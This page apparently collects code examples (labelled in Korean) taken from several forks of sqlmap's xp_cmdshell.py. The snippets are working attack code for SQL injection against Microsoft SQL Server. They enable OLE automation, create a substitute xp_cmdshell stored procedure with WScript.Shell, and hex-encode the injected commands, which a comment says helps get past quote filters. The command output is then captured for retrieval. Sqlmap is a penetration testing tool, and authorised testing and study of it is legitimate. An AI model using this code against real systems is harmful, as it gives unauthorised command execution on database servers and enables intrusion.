예제 #1
0
파일: xp_cmdshell.py 프로젝트: d1on/sqlmap
    def __xpCmdshellCreate(self):
        cmd = ""

        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

            cmd += "EXEC master..sp_configure 'show advanced options',1;"
            cmd += "RECONFIGURE WITH OVERRIDE;"
            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
            cmd += "RECONFIGURE WITH OVERRIDE"
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self.__randStr = randomStr(lowercase=True)
        self.__xpCmdshellNew = randomStr(lowercase=True)
        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew

        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
        cmd += "set @%s='" % self.__randStr
        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
        cmd += "EXEC sp_OADestroy @ID';"
        cmd += "EXEC master..sp_executesql @%s" % self.__randStr

        if Backend.isVersionWithin(("2005", "2008")):
            cmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(cmd))
예제 #2
0
    def __xpCmdshellConfigure(self, mode):
        if Backend.isVersionWithin(("2005", "2008")):
            cmd = self.__xpCmdshellConfigure2005(mode)
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)

        inject.goStacked(agent.runAsDBMSUser(cmd))
예제 #3
0
    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
        # When user provides DBMS credentials (with --dbms-cred) we need to
        # redirect the command standard output to a temporary file in order
        # to retrieve it afterwards
        # NOTE: this does not need to be done when the command is 'del' to
        # delete the temporary file
        if conf.dbmsCred and insertIntoTable:
            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)

        # Obfuscate the command to execute, also useful to bypass filters
        # on single-quotes
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = "0x%s" % hexencode(cmd)
        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)

        # Insert the command standard output into a support table,
        # 'sqlmapoutput', except when DBMS credentials are provided because
        # it does not work unfortunately, BULK INSERT needs to be used to
        # retrieve the output when OPENROWSET is used hence the redirection
        # to a temporary file from above
        if insertIntoTable and not conf.dbmsCred:
            self.__forgedCmd += "INSERT INTO %s " % insertIntoTable

        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

        return agent.runAsDBMSUser(self.__forgedCmd)
예제 #4
0
    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
        # When user provides DBMS credentials (with --dbms-cred) we need to
        # redirect the command standard output to a temporary file in order
        # to retrieve it afterwards
        # NOTE: this does not need to be done when the command is 'del' to
        # delete the temporary file
        if conf.dbmsCred and insertIntoTable:
            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)

        # Obfuscate the command to execute, also useful to bypass filters
        # on single-quotes
        self._randStr = randomStr(lowercase=True)
        self._cmd = "0x%s" % hexencode(cmd)
        self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr
        self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd)

        # Insert the command standard output into a support table,
        # 'sqlmapoutput', except when DBMS credentials are provided because
        # it does not work unfortunately, BULK INSERT needs to be used to
        # retrieve the output when OPENROWSET is used hence the redirection
        # to a temporary file from above
        if insertIntoTable and not conf.dbmsCred:
            self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable

        self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr)

        return agent.runAsDBMSUser(self._forgedCmd)
예제 #5
0
    def _xpCmdshellConfigure(self, mode):
        if Backend.isVersionWithin(("2000", )):
            cmd = self._xpCmdshellConfigure2000(mode)
        else:
            cmd = self._xpCmdshellConfigure2005(mode)

        inject.goStacked(agent.runAsDBMSUser(cmd))
예제 #6
0
파일: xp_cmdshell.py 프로젝트: aadit/sqlmap
    def xpCmdshellForgeCmd(self, cmd):
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = "0x%s" % hexencode(cmd)
        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

        return agent.runAsDBMSUser(self.__forgedCmd)
예제 #7
0
    def _xpCmdshellCreate(self):
        cmd = ""

        if not Backend.isVersionWithin(("2000",)):
            logger.debug("activating sp_OACreate")

            cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self._randStr = randomStr(lowercase=True)
        self.xpCmdshellStr = "master..new_xp_cmdshell"

        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

        if not Backend.isVersionWithin(("2000",)):
            cmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(cmd))
예제 #8
0
    def xpCmdshellForgeCmd(self, cmd):
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = "0x%s" % hexencode(cmd)
        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr,
                                             self.__randStr)

        return agent.runAsDBMSUser(self.__forgedCmd)
예제 #9
0
    def __xpCmdshellCreate(self):
        cmd = ""

        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

            cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self.__randStr = randomStr(lowercase=True)
        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew

        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)

        if Backend.isVersionWithin(("2005", "2008")):
            cmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(cmd))
예제 #10
0
    def _xpCmdshellCreate(self):
        cmd = ""

        if Backend.isVersionWithin(("2005", "2008", "2012")):
            logger.debug("activating sp_OACreate")

            cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self._randStr = randomStr(lowercase=True)
        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew

        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)

        if Backend.isVersionWithin(("2005", "2008")):
            cmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(cmd))